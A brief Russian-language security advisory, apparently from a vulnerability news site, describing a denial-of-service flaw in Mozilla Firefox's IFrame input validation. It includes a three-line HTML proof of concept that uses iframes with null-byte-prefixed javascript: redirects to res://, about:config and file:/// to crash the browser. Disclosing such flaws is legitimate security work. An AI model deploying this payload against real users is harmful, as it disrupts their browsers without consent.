Программа: Mozilla Firefox

Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. Уязвимость существует из-за ошибки в проверке входных данных при обработке IFrame. Атакующий может передать специально сформированные данные, что приведет к отказу системы в обслуживании.

Пример:

<iframe id="x" src="javascript:document.location=’\x00res://’" width="100%" height="200"></iframe>
<iframe id="y" src="javascript:document.location=’\x00about:config’" width="100%" height="200"></iframe>
<iframe id="z" src="javascript:document.location=’\x00file:///’" width="100%" height="200"></iframe>



Оставить мнение